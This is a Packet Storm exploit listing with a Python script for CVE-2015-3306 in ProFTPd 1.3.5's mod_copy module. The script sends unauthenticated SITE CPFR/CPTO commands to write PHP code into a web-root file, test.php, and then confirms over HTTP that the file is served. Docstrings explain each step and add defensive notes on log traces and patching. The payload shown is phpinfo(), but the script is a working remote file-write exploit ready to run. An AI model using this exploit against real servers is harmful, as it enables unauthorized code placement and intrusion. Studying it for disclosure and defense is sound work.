packetstorm | Shellbr3ak | PACKETSTORM:162777
HistoryMay 26, 2021 - 12:00 a.m.

ProFTPd 1.3.5 Remote Command Execution

2021-05-26 00:00:00
Shellbr3ak
packetstormsecurity.com
1293
`# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)  
# Date: 25/05/2021  
# Exploit Author: Shellbr3ak  
# Version: 1.3.5   
# Tested on: Ubuntu 16.04.6 LTS  
# CVE : CVE-2015-3306  
  
#!/usr/bin/env python3  
  
import sys  
import socket  
import requests  
  
def exploit(client, target):
    """Replay the CVE-2015-3306 proof of concept against ``target`` on port 21.

    ``client`` is an unconnected socket; it is connected, used and closed here.
    No USER/PASS exchange is sent: every ``SITE`` command below goes out on an
    unauthenticated control connection, which is the condition the CVE is about.

    The function never inspects the server's reply codes, so the final
    'Exploit Completed' line only means the script reached its end, not that
    anything was written on the server.

    Defensive notes: unauthenticated ``SITE CPFR`` / ``SITE CPTO`` entries in
    the FTP server's logs, a CPTO argument that is not a path, a CPFR that
    references ``/proc/self/fd/``, and a new ``test.php`` in the web root are
    the traces this sequence leaves. Disabling mod_copy, or running a ProFTPD
    build patched for CVE-2015-3306, removes the exposure.
    """
    client.connect((target, 21))

    # Fixed-size read of the server greeting; a longer banner is simply
    # truncated at 74 bytes and the remainder shows up in the next recv().
    greeting = client.recv(74)
    print(greeting.decode())

    steps = (
        # Pair 1: pick an existing file as the copy source, then give PHP
        # source text where a destination path is expected. Presumably the
        # aim is to get that text recorded in a file the server process has
        # open -- the page does not show which one.
        b'site cpfr /etc/passwd\r\n',
        b'site cpto <?php phpinfo(); ?>\r\n',  # phpinfo() is just a PoC.
        # Pair 2: copy whatever descriptor 3 of the server process refers to
        # into the web root under a .php name.
        b'site cpfr /proc/self/fd/3\r\n',
        b'site cpto /var/www/html/test.php\r\n',
    )
    for command in steps:
        client.send(command)
        # Replies are echoed for the operator only; nothing is parsed.
        print(client.recv(1024).decode())

    client.close()
    print('Exploit Completed')
  
def check(url):
    """Fetch ``url`` over HTTP and report whether it answered with status 200.

    The only signal used is the status code. A 200 shows that something is
    served at ``url``; it does not prove that this run created the file (one
    may already have existed there), and the response body is never examined.
    Any other status is reported as a failure with a hint about write
    permissions on the directory.
    """
    response = requests.get(url)  # Requesting the written PoC php file via HTTP
    if response.status_code != 200:
        print('[!] Something Went Wrong')
        print('[!] Directory might not be writable')
        return
    print('[+] File Written Successfully')
    print(f'[+] Go to : {url}')
  
def main():
    """Run the FTP stage against the host in ``sys.argv[1]``, then the HTTP check.

    The target is taken verbatim from the first command-line argument and is
    used both as the FTP peer and as the host part of the URL that is checked
    afterwards (plain HTTP, default port, path ``/test.php``).
    """
    # IPv4 TCP socket; exploit() connects it to port 21 and closes it.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    host = sys.argv[1]
    exploit(sock, host)
    check(f'http://{host}/test.php')
  
# Script entry point: only runs when executed directly, not when imported.
if __name__ == "__main__":
    main()
  
`